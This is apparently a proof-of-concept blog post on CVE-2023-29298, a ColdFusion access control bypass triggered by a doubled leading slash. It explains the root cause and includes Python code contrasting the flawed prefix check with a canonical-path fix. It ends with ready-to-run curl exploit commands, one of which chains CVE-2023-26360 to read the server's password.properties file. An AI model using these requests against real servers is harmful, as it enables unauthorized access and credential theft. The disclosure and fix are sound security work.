CVE-2023-29298 Adobe Poc

Prapattimynk, Wednesday, July 12, 2023

Adobe ColdFusion Access Control Bypass
As the attacker-controlled URL path is tested with a call to java.lang.String.startsWith, this access check can be bypassed by inserting an additional character at the start of the URL path. The inserted character causes the startsWith check to fail, but the underlying servlet is still able to resolve the requested resource. The character in question is an additional forward slash: a request path beginning with //CFIDE/ does not start with /CFIDE/ as far as the check is concerned, yet it is served exactly as the single-slash path would be. The root cause is that the access decision is made on the raw request path while the resource lookup is made on a normalized one.
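The mismatch between the raw path used for the decision and the normalized path used for the lookup is easiest to see side by side. The block below is an added example and not ColdFusion's code: it mirrors a startsWith-style deny list on the raw path, approximates how a resolver collapses repeated slashes, and then shows the hardened form that decides on the canonical path. The PROTECTED_PREFIXES list is a stand-in for illustration, not ColdFusion's real configuration.

```python
"""Prefix access checks vs. the extra-leading-slash bypass (CVE-2023-29298 style).

Added example, not ColdFusion's source. The protected prefixes are a stand-in.
"""
import posixpath
import re

# Stand-in deny list (assumption for illustration; ColdFusion's real list
# lives in its own configuration, not here).
PROTECTED_PREFIXES = ("/CFIDE/wizards/", "/CFIDE/adminapi/", "/CFIDE/administrator/")


def is_protected_vulnerable(raw_path: str) -> bool:
    """Mirror the flawed check: a startsWith comparison on the raw request path.

    '//CFIDE/wizards/...' does not start with '/CFIDE/wizards/', so the
    request is treated as unprotected even though it names the same resource.
    """
    return any(raw_path.startswith(prefix) for prefix in PROTECTED_PREFIXES)


def resolve_like_servlet(raw_path: str) -> str:
    """Approximate what the resource resolver does with the path.

    Repeated slashes collapse and dot segments resolve, so '//CFIDE/x' and
    '/CFIDE/x' name the same resource. posixpath.normpath deliberately keeps a
    leading '//' (POSIX allows it a special meaning), so slashes are collapsed
    first; relying on normpath alone would leave the bypass in place.
    """
    collapsed = re.sub(r"/+", "/", raw_path)
    normalized = posixpath.normpath(collapsed)
    if not normalized.startswith("/"):
        normalized = "/" + normalized
    return normalized


def is_protected_fixed(raw_path: str) -> bool:
    """Hardened check: decide on the canonical path the server will actually
    serve, compared case-insensitively so a Windows host's case-insensitive
    filesystem cannot be used for the same kind of mismatch."""
    canonical = resolve_like_servlet(raw_path).lower()
    return any(canonical.startswith(prefix.lower()) for prefix in PROTECTED_PREFIXES)


def check_request(raw_path: str) -> dict:
    """Return both verdicts for one path plus the resource that would be served."""
    return {
        "path": raw_path,
        "resolves_to": resolve_like_servlet(raw_path),
        "vulnerable_check_blocks": is_protected_vulnerable(raw_path),
        "fixed_check_blocks": is_protected_fixed(raw_path),
    }


if __name__ == "__main__":
    # Constructed sample requests: the single-slash path, the bypass, and a benign page.
    for path in ("/CFIDE/wizards/common/utils.cfc",
                 "//CFIDE/wizards/common/utils.cfc",
                 "///CFIDE/wizards/common/utils.cfc",
                 "/index.cfm"):
        verdict = check_request(path)
        print(f"{path:40} -> {verdict['resolves_to']:34} "
              f"vulnerable_blocks={verdict['vulnerable_check_blocks']} "
              f"fixed_blocks={verdict['fixed_check_blocks']}")
```

The fix is not "also deny //CFIDE/": every new spelling of the path would need its own rule. The check has to run on the same canonical path the resolver uses, which is why resolve_like_servlet is shared between the lookup and the decision.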

⚠️The access control bypass in CVE-2023-29298 can also be leveraged to assist in the exploitation of an existing ColdFusion vulnerability (for example CVE-2023-26360, which allows for both arbitrary file reading and RCE). CVE-2023-29298 can be chained with CVE-2023-26360: the extra leading slash gets the request past the access control to a CFC endpoint under /CFIDE/, and the request body then triggers the second vulnerability.

💾Trigger the vulnerability (CVE-2023-29298) using the cURL command below. The ^ characters escape & for cmd.exe; in a Unix shell, quote the URL instead. The same request with a single leading slash (/CFIDE/...) is refused by the access control, so a response carrying the wizardHash output for the //CFIDE/ path confirms the bypass:

c:\> curl -v -k http://172.23.10.174:8500//CFIDE/wizards/common/utils.cfc?method=wizardHash^&inPassword=foo

💾Chain CVE-2023-29298 with CVE-2023-26360: the double slash bypasses the access control to reach the CFC endpoint, and the POST body triggers the second vulnerability (here a read of the ColdFusion password.properties file relative to the application):

c:\> curl -v -k http://172.26.181.162:8500//CFIDE/wizards/common/utils.cfc?method=wizardHash^&inPassword=foo^&_cfclient=true^&returnFormat=wddx -X POST -H "Content-Type: application/x-www-form-urlencoded" --data "_variables={\"about\":{\"_metadata\":{\"classname\":\"\\..\\lib\\password.properties\"},\"_variables\":{}}}"
